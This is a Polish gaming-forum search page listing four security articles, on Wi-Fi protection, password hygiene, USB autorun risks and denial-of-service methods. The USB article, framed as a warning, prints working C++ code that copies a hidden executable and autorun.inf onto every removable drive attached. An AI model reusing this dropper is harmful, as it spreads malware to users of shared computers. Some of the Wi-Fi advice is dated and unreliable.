Skocz do zawartości

Znajdź zawartość

Wyświetlanie wyników dla tagów '[Artykuł]' .

  • Wyszukaj za pomocą tagów

    Wpisz tagi, oddzielając je przecinkami.
  • Wyszukaj przy użyciu nazwy użytkownika

Typ zawartości


Forum

  • Forum główne
    • Regulaminy
    • Sprawy dotyczące forum
    • Rekrutacja
    • Konkursy i turnieje
    • Wesprzyj naszą sieć serwerów!
    • Redakcja CSowicze.pl
    • Strefa Ogłoszeń Serwerowych
    • Masz swoj serwer? Dołącz do Nas!
  • Strefa Banów
    • Bany Counter Strike 1.6
    • Bany Counter Strike 2
  • Serwery Counter Strike 1.6
    • ★ [Losowe Cheaty] ★ - IP: 83.168.108.124:27015
    • ★ [ZOMBIE PLAGUE CLASSIC] ★ - IP: 91.224.117.165:27015
    • ★ IKS ZOMBIE+EXP 95LV ★ - IP: 83.168.108.124:27016
    • ★ [AIM AWP ARENA] ★ - IP: 83.168.108.124:27017
  • Serwery Counter Strike 2
    • ★ [Losowe Cheaty] ★ - IP: 83.168.108.43:27015
    • ★ [Only AWP] ★ - IP: 83.168.108.43:27017
  • Inne gry
  • Serwery Głosowe
    • TeamSpeak 3 - TSGAME24.PL
    • Discord- https://discord.gg/ryQaHmHMFv
  • Strefa Gier
    • Aktualizacje / Nowości / Ciekawostki
    • Counter Strike
    • League Of Legends
    • Download / Poradniki / Media / Inne
    • Przeceny/ Gry/ Kody/ Przedmioty
    • Recenzje gier
    • Zareklamuj swoją stronę / serwer!
  • Inne
    • Liga Typera
    • Offtopic
    • Muzyka
    • Giełda
  • Archiwum Forum
    • Zbanowani
    • Tematy Archiwalne

Kategorie

  • Counter Strike 1.6
    • Pluginy
    • [ReHLDS] Moduły / [AmxModX] Moduły
    • [HLDS] Moduły
    • Modele / Dodatki
    • Gotowe paczki
    • Mapy
    • Roundsoundy
  • Counter Strike Global Offensive
    • Pluginy
    • Gotowe paczki
    • Roundsoundy
    • Modele / Dodatki
  • Grafika
    • PSD
    • XCF
    • Czcionki
    • Inne
  • Invision Community 4
    • Aplikacje
    • Wtyczki
    • Szablony
    • Nulled
    • Tłumaczenia
    • Releases
  • IP.Board
    • Aplikacje / Wtyczki
    • Skiny
    • Inne dodatki
  • Inne
  • Stare pliki (brak download)

Szukaj wyników w...

Znajdź wyniki, które zawierają...


Data utworzenia

  • Od tej daty

    Do tej daty


Ostatnia aktualizacja

  • Od tej daty

    Do tej daty


Filtruj po ilości...

Dołączył

  • Od tej daty

    Do tej daty


Grupa podstawowa


Lokalizacja


Hobby


Imię


Ulubiony Mod


Discord


Steam


Facebook


Instagram


Strona WWW

Znaleziono 4 wyniki

  1. Sposobów zabezpieczeń sieci jest bardzo wiele, ich skuteczność i złożoność zależy w głównej mierze od doświadczenia i pomysłowości administratora. W przypadku sieci WLAN pole do popisu jest odrobinę mniejsze, istnieje bowiem kilka ogólnie znanych i wykorzystywanych metod ochrony (nie oznacza to wcale, że nie ma sieci zabezpieczonych `nietypowo`). Pierwszą czynnością zwiększająca bezpieczeństwo naszej sieci bezprzewodowej powinno być ustawienie hasła w AP. Jest to krok, którego nie możemy pominąć jeśli myślimy poważnie o ochronie Wi-Fi. Jeżeli mamy taką możliwość postawmy AP za firewallem. Niektóre Punkty Dostępowe posiadają opcję regulacji mocy. Możemy ją zmniejszyć, aby zasięg AP nie wychodził poza pomieszczenie, w którym jest ustawiony - nie ma potrzeby dzielenia się Internetem z sąsiadami. Przedstawiam najbardziej znane metody zabezpieczeń sieci Wi-Fi. Wyłączenie rozgłaszania SSID (Service Set IDentifier) [poziom bezpieczeństwa - zerowy] Jest to jeden z najmniej skutecznych sposobów zabezpieczeń sieci bezprzewodowej. Osoba chcąca połączyć się z naszą siecią, musi podać jej nazwę. Ukrycie SSID ani odrobinę nie podnosi poziomu bezpieczeństwa, zdobycie ukrytej nazwy sieci to kwestia kilku minut. Wspominam o tym z czystej formalności. Filtrowanie adresów MAC [poziom bezpieczeństwa - bardzo niski] Technika ta polega na ustawieniu w Punkcie Dostępowym listy adresów kart sieciowych, które legalnie mogą korzystać z sieci. Jeżeli adres MAC klienta nie znajduje się na tej liście, nie uzyska on połączenia z siecią. Przy tym rodzaju zabezpieczenia, często stosuje się usługę DHCP, która przydziela konkretne IP danemu adresowi MAC. Jeżeli w swojej sieci planujesz wprowadzić filtrację MAC pomyśl też o innych zabezpieczeniach, gdyż to jest niewystarczające. WEP (Wired Equivalent Privacy) [poziom bezpieczeństwa - bardzo niski] Szyfrowanie połączenia z użyciem klucza WEP jest jednym z najczęsciej stosowanych rodzajów zabezpieczeń i obecnie dostępne jest w każdym AP. Polega ono na ustawieniu hasła, które każdy klient musi podać zanim uzyska dostęp do sieci. Jeżeli zdecydujesz się na stosowanie tego typu zabezpieczenia i twój AP posiada taka opcję, użyj klucza 128 (13-znakowe hasło) zamiast 64 bitowego. Fakt, iż sieć jest zabezpieczona w widoczny sposób (każdy skaner sieci bezprzewodowej to pokaże) odstraszy przynajmniej część osób chcących się do niej dostać. Z pozoru może wydawać się to skuteczną metodą ochrony sieci, jednak WEP podatny jest na różne formy ataków (ze względu na wektor inicjujący (IV). Co prawda są to techniki czasochłonne, jednak napewno znajdzie się ktoś kto zechce przełamać to zabezpieczenie. Oprócz tego ta metoda szyfrowania, w pewnym stopniu, obciąża naszą sieć. Jeśli jednak masz wybierać pomiędzy szyfrowaniem WEP lub jego brakiem, wybierz to pierwsze - uchronisz swoje hasła i inne ważne informacje przed dostaniem się w niepowołane ręce. Pomimo wad szyfrowania WEP nadaje się ono znakomicie jako jedna z warstw chroniących twoją sieć. WPA (Wi-Fi Protected Access) [poziom bezpieczeństwa - wysoki*] WPA zostało wprowadzone jako następca szyfrowania WEP, bezpieczniejsze i pozbawione wad poprzednika. Jedynym minusem tego zabezpieczenia jest dosyć spore obciążanie sieci WPA dzieli się na dwa rodzaje: Personal (opiera się na kluczu PSK (długość od 8 do 63 znaków), bez którego nie nawiążemy połączenia z siecią) oraz Enterprise (korzystający z serwera RADIUS). Niestety szyfrowanie WPA nie jest dostępne w każdym AP, jeśli jednak twój Punkt Dostępowy oraz karty klienckie je obsługują i dla bezpieczeństwa sieci zrobisz wszystko - użyj właśnie WPA. Należy wspomnieć też o WPA2, które poza inną metodą szyfrowania (AES-CCMP) nie różni się niczym w porównaniu do WPA (RC4/TKIP). *Szyfrowanie WPA jest bezpieczne tylko przy stosowaniu długich, niestandardowych haseł (najlepiej maksymalnej długości), bowiem inne są podatne na ataki słownikowe. RADIUS (Remote Authentication Dial-In User Service) [poziom bezpieczeństwa - wysoki] RADIUS jest protokołem, umożliwiającym autentykację, autoryzację oraz rozliczanie (AAA - Authencication, Authorization, Accounting). Schemat działania jest bardzo prosty: klient chcący uzyskać dostęp, np. do Internetu wysyła do urządzenia NAS (Network Access Server, którego rolę w sieciach bezprzewodowych pełni Access Point) swój adres MAC. Jest on przesyłany do serwera RADIUS, na którym zapisane są informacje o wszystkich autoryzowanych użytkownikach (login, hasło, adres MAC). Jeżeli dany adres MAC znajdował się na serwerze, zostaje wysłana prośba o podanie loginu i hasła. Gdy weryfikacja przebiegnie poprawnie klient uzyska dostęp do sieci. Mimo, że login oraz hasło, których używamy przy logowaniu się do serwera RADIUS są szyfrowane (MD5), należałoby zabezpieczyć także całe nasze połączenie (WEP/WPA). Minusem RADIUSa jest konieczność postawienia dodatkowego serwera, na którym mógłby on działać oraz to, że nie każdy AP potrafi z nim współpracować. Jednym z najbardziej znanych serwerów RADIUS jest freeradius (http://www.freeradius.org). VPN (Virtual Private Network) [poziom bezpieczeństwa - wysoki] Dzięki VPN, za pośrednictwem publicznej sieci (Internetu), możemy utworzyć bezpieczny tunel pomiędzy dwoma klientami/sieciami prywatnymi/klientem a siecią prywatną. (PPTP (Point-to-Point Tunneling Protocol)). W celu autentykacji stosuje się zazwyczaj kombinację login oraz hasło/certyfikaty/klucze prywatne. Jednym ze sposobów podniesienia bezpieczeństwa sieci VPN jest zastosowanie zbioru protokołów kryptograficznych znanych jako IPsec. Gwarantuje on, że dane które przesyłamy przez Internet pozostają w niezmienionej formie oraz są praktycznie nie do odczytania dla nikogo poza adresatem/odbiorcą (użycie szyfrowania). Na chwilę obecną jest to najbezpieczniejszy i najskuteczniejszy sposób zabezpieczania sieci bezprzewodowych. Przedstawione tu metody ochrony sieci WLAN zostały opisane skrótowo, bez zagłębiania się w konfigurację aplikacji, urządzeń czy serwerów. autorzy: Thane kontakt: thane (na) tlen.pl
  2. Najważniejsze zasady tworzenia bezpiecznych haseł. STOSUJ DŁUGIE HASŁA Im dłuższe jest hasło, tym trudniej je złamać. Do ochrony ważnych zasobów nie stosuj haseł krótszych niż 8-znakowe. UŻYWAJ RÓŻNYCH ZNAKÓW Używanie haseł typu "111 111" to kiepski pomysł, bo algorytmy łamiące świetnie sobie radzą z powtarzającymi się znakami. Hasło powinno się składać z różnego typu znaków: liter (małych i dużych), cyfr, znaków interpunkcyjnych i innych znaków specjalnych. Im większego zasobu znaków używasz, tym krótsze może być hasło. FRAZY ZAMIAST JEDNOWYRAZOWYCH HASEŁ Jeżeli system uwierzytelniania umożliwia umieszczanie znaków spacji w haśle, stosuj jako hasła całe zdania. Łatwiej zapamiętasz, i wzmocnisz hasło. UNIKAJ NASTĘPUJĄCYCH DZIAŁAŃ: - Regularnej zamiany znaków alfabetu łacińskiego w znaki specjalne (np. każdej litery "a" w "@". Nie używaj jako haseł daty urodzenia, numeru dowodu czy paszportu, numeru pesel itp. - Nie stosuj wyrazów z obcego języka. Zaawansowane narzędzia do łamania haseł korzystają z tzw. metody słownikowej. Nie pomoże też napisanie hasła wspak. - Zawsze używaj więcej niż jednego hasła. W przeciwnym razie złamanie jednego hasła udostępni agresorowi wszystkie twoje chronione tym hasłem zasoby. - Nie korzystaj z usług online przeznaczonych do zarządzania hasłami. Powierzasz wtedy swoje chronione zasoby serwisowi, który nie podlega twojej kontroli. -Choć sami proponujemy korzystanie z menedżera haseł, KeePass Password Safe, odradzamy poszukiwanie tego typu oprogramowania na własną rękę. Proponowane przez nas narzędzie jest sprawdzone i uznane przez ekspertów za rzetelne. Co do innych programów - możesz trafi ć na coś, co będzie wykradało twoje dane. BEZPIECZNIE PRZECHOWUJ HASŁA Zapisanie haseł na zwykłej kartce papieru wcale nie jest złym pomysłem. A już na pewno lepszym niż powierzenie tych haseł jakiemuś "bezpiecznemu" magazynowi haseł online. Oczywiście kartkę z hasłami przechowuj w bezpiecznym miejscu.
  3. Niewiele osób zdaje sobie sprawe jak niebezpieczne jest używanie własnego pendriva w miejscach publicznych takich jak: Biblioteki Kafejki internetowe Szkolna pracownia internetowa.... Tego typu miejsca są wylęgarnią dla wszelkiego typu robactwa, nie znaczy ze mamy nie używać pendrive w takich miejscach, należy tylko zachować pewną ostrożność. Jeśli podłączamy nasz pendrive do naszego komputera po wizycie np. w bibliotece nie włączajmy go klikając na niego 2x lewym przyciskiem myszy gdyż powoduje to włączenie autorunu i infekcje naszego komputera o ile pendrive jest zarażony, dużo lepszym wyjściem jest kliknąć na niego prawym przyciskiem myszy i kliknąć otwórz- wtedy autorun się nie uruchomi. Pyzatym należy włączyć pokazywanie plików ukrytych i systemowych naszym systemie. Robimy to przez klikniecie na Narzędzia -> Opcje folderów -> Widok. Zaznaczamy tam Pokaż ukryte pliki i foldery a także odznaczamy Ukryj chronione pliki systemu windows Od teraz będziemy widzieć pliki, które ktoś umieścił na naszym pendrive bez naszej wiedzy i zgody. Pokaże teraz jak łatwo napisać program który po podłączeniu pendrive do PC automatycznie skopiuje na niego autorun + program, aby pokazać, że wcale nie jest to takie trudne i że naprawdę możemy stać się ofiarą takiego ataku. Na początku dołączamy pliki nagłówkowe takie jak: #include <windows.h> #include <string> #include <vector> Napiszmy teraz funkcje która znajdzie wszelkie pendrivy podlaczone do PC void GetPendrives(std::vector<std::string>* pendrives) { char* bufor=new char[1024]; DWORD need=GetLogicalDriveStrings(1024,bufor);//pobieramy litery dyskow if(need > 1024)//jesli bufor jest za maly alokujemy bufor o odpowiedniej dlugosci { delete bufor; bufor=new char[need]; GetLogicalDriveStrings(need,bufor); } int n=need/4; // ilosc dyskow std::string* dyski=new std::string[n]; int i=0; while(i<n) { dyski[i]=(char*)(bufor+(i*4)); i++; } pendrives->clear();//usuwamy wszystko co jest w vectorze i=0; while(i<n) { if(GetDriveType(dyski[i].c_str())==DRIVE_REMOVABLE)//sprawdzamy ktore dyski sa pendrivami { pendrives->push_back(dyski[i]); } i++; } } Teraz czas na inne potrzebne nam funkcje bool FindInVector(const char* str,std::vector<std::string> vec)//funkcja ktora sprawdza czy pojawil sie nowy pendrive { int n=vec.size(); int i=0; while(i<n) { if(vec[i]==str) { return true; } i++; } return false; } bool ExtractExe(char* id, char *filename)//funkcja wypakowujaca plik z zasobow { bool result = false;HRSRC hResource=NULL;hResource = FindResource(GetModuleHandle(NULL),id , RT_RCDATA); if(!hResource) { return result; } if( hResource != NULL ){ HGLOBAL hLoader = LoadResource(NULL,hResource); if( hLoader != NULL ){ byte *data = (byte *)LockResource(hLoader); DWORD len = SizeofResource(NULL,hResource);if( data != NULL && len > 0 ){ HANDLE hFile = CreateFile(filename, GENERIC_READ | GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); if( hFile != INVALID_HANDLE_VALUE ){ DWORD written = 0; int write = WriteFile(hFile, data, len, &written, NULL); if( len == written && write == TRUE ) result = true; } CloseHandle(hFile); } UnlockResource(hLoader); } FreeResource(hLoader); } return result; } A ten kod umieszczamy wewnatrz main: std::vector<std::string> vec; GetPendrives(&vec); int i=0; while(i<vec.size()){ //w tym momecie wypakowujemy na wszystkie pendrivy nasz plik //przyjmujemy ze nasz exe ma w zasobach numer 1005 a autorun 1006 std::string exe=vec[i]; std::string autorun=vec[i]; exe+="Start.exe"; autorun+="autorun.inf"; ExtractExe(MAKEINTRESOURCE(1005),(char*)exe.c_str());//wypakowujemy ExtractExe(MAKEINTRESOURCE(1006),(char*)autorun.c_str());//wypakowujemy SetFileAttributes(exe.c_str(),FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);//ustawiamy atrybut ukryty i systemowy SetFileAttributes(autorun.c_str(),FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);//ustawiamy atrybut ukryty i systemowy i++; } std::vector<std::string> tmp; int n=0; i=0; while(1)//nieskonczona petla ktora sprawdza czy nie pojawiły się nowe pendrivy { GetPendrives(&tmp); n=tmp.size(); i=0; while(i<n) { if(!FindInVector(tmp[i].c_str(),vec)) { //w tym momecie wypakowujemy na ten dysk nasz plik //przyjmujemy ze nasz exe ma w zasobach numer 1005 a autorun 1006 std::string exe=tmp[i]; std::string autorun=tmp[i]; exe+="Start.exe"; autorun+="autorun.inf"; ExtractExe(MAKEINTRESOURCE(1005),(char*)exe.c_str());//wypakowujemy ExtractExe(MAKEINTRESOURCE(1006),(char*)autorun.c_str());//wypakowujemy SetFileAttributes(exe.c_str(),FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);//ustawiamy atrybut ukryty i systemowy SetFileAttributes(autorun.c_str(),FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);//ustawiamy atrybut ukryty i systemowy} i++; } vec=tmp; Sleep(10000); } Na koniec do projektu musimy dodać zasoby ale tego już nie będę tu opisywał gdyż można to znaleźć w google Przykładowy plik autorun: [autorun] OPEN=Start.exe shellexecute=Start.exe shell=Auto shellAuto=&Autoplay shellAutocommand=Start.exe Taki plik umieszczamy w zasobach pod numerem 1006 a plik exe, który ma być uruchamiany pod numerem 1005 Mam nadzieje, że artykuł przekonał was do tego aby uważać na swoje pendrivy Autor artykułu: Grzonu (grzonu.com.pl)
  4. "Odmowa usługi (ang. Denial of Service w skrócie DoS) to jedno z zagrożeń, przed którym najtrudniej się ochronić. Nie prowadzi ono do zniszczenia czy ujawnienia danych, lecz raczej do utraty reputacji i korzyści materialnych z powodu blokowania możliwości świadczenia usług lub powodowania dużych opóźnień w dostępnie do nich." Obrona przed tego typu atakami jest niezwykle trudna. DOS wykorzystuje z reguły właściwości protokołu TCP/IP. Najpopularniejszym sposobem wywołania efektu odmowy usługi jest masowe "floodowanie". Oznacza to nic innego jak wysyłanie sporej ilości żądań wywołania serwera/usługi w krótkim odstępie czasu. Połączenia są tak spreparowane, że ich treść ma drugorzędne znaczenie, istotne jest obciążenie samego serwera tak by został skutecznie "zalany" co doprowadza do jego niestabilnej pracy. Innym narzędziem wywołującym omawiany efekt jest tak zwany "landing". Poprzez wykorzystanie specyfiki najpopularniejszego protokołu TCP/IP nawiązuje się połączenie z serwerem, po czym zmusza się go do wywoływania samego siebie. Powoduje to wykonywania nieskończonej pętli, co prowadzi do niedostępności hosta. Istnieje również możliwość wykorzystania jednego ze składowych protokołów TCP/IP -ICMP. Protokół ICMP jest bardziej znany w mowie potocznej jako "ping". Jego głównym przeznaczeniem jest badanie trwałości połączenia pomiędzy dwoma hostami na zasadzie "prośby o echo" oraz "odpowiedzi echa". Znając tą właściwość istnieje możliwość wysłania wielu próśb o echo z wielu hostów jednocześnie. Spowoduje to, iż serwer stanie się niedostępny w momencie niemożliwości wysłania odpowiedzi na żądania echa. Równie niebezpiecznym narzędziem wywołującym niedostępność serwera jest "spam". Technika polega na preparowaniu nagłówków poczty odwołujących się do celu ataku. Po rozesłaniu możliwie jak największej ilości wiadomości elektronicznych, odbiorcy odpowiadają na nią co prowadzi do niemożności realizacji zadań serwera, a w efekcie końcowym do jego ograniczenia. Powyżej zostały opisane najpopularniejsze metody wywołujące niedostępność hosta. Sam atak DOS jest jednym z najpopularniejszych ataków w sieci. Niestety jak do tej pory nie ma jednoznacznej recepty, pozwalającej w jednoznaczny sposób uniknąć tego typu następstw. Co gorsza w Internecie znajduje się wiele, już gotowych aplikacji, które w znacznym stopniu ułatwiają tego typu naruszenia. Powoduje to, że nawet początkujący haker potrafi wyrządzić ogromne straty. Jedyną metodą, która w jakikolwiek sposób potrafi ograniczyć ataki DOS to poważne podejście do konfiguracji routera sieciowego. Należy ograniczyć ruch, który jest generowany przez, niektóre protokoły. Na przykład ICMP, co pozwoli na uniknięcie masowych żądań o odpowiedź echa. Kolejnym ważnym elementem jest stałe monitorowanie ruchu na styku sieci wewnętrznej z zewnętrzną.
×
×
  • Dodaj nową pozycję...

Powiadomienie o plikach cookie